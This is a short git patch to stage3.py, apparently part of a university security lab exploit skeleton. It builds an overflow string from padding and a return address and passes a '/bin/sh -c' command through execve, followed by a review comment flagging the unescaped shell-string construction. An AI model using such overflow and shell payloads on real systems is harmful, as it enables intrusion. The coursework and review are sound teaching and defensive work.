From abdb8d890a039c44c99a43770de3fb7f248e66bc Mon Sep 17 00:00:00 2001
From: Adam Blank <blank@caltech.edu>
Date: Mon, 19 Oct 2020 12:21:16 -0700
Subject: [PATCH] Update stage3.py
---
 stage3.py | 5 ++++-
 1 file changed, 4 insertions(+), 1 deletion(-)
diff --git a/stage3.py b/stage3.py
index 9ceee3c..87bf1d5 100644
--- a/stage3.py
+++ b/stage3.py
@@ -22,7 +22,10 @@ ADDRESS = to_bytes(0xdeadbeef)
 USER = b"FILL ME IN"
 PASSWORD = b"FILL ME IN"
-SCRIPT = [b"/bin/sh\x00", b"-c\x00", b"echo -n \"" + USER + b"\" | sha384sum > /hackme/tiny/tokens/" + PASSWORD + b"\x00", b"\x00"]
+
+# These are the arguments that make up the shell script we want to execve.
+# Don't forget that there needs to be a NULL pointer as the last argument in addition to these!
+SCRIPT = [b"/bin/sh\x00", b"-c\x00", b"echo -n \"" + USER + b"\" | sha384sum > /hackme/tiny/tokens/" + PASSWORD + b"\x00"]
 # The "exploit string" is what we send in as the headers
 HEADERS = PADDING + ADDRESS
-- 
GitLab
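Review bot: USER and PASSWORD are concatenated byte-for-byte into the `/bin/sh -c` string on the new SCRIPT line, so a space, quote, `$` or `/` in either value changes what the shell parses. With the placeholders left as `FILL ME IN`, the redirect target already splits into three words and the output lands in a file named `FILL`. This is the same string-built-command shape that causes shell injection in ordinary code, so it is worth failing fast just above SCRIPT, for example `if not (USER.isalnum() and PASSWORD.isalnum()): raise ValueError("fill in USER/PASSWORD with plain alphanumerics")`. Widen the check to whatever character set the course actually permits; that set is not visible in this hunk.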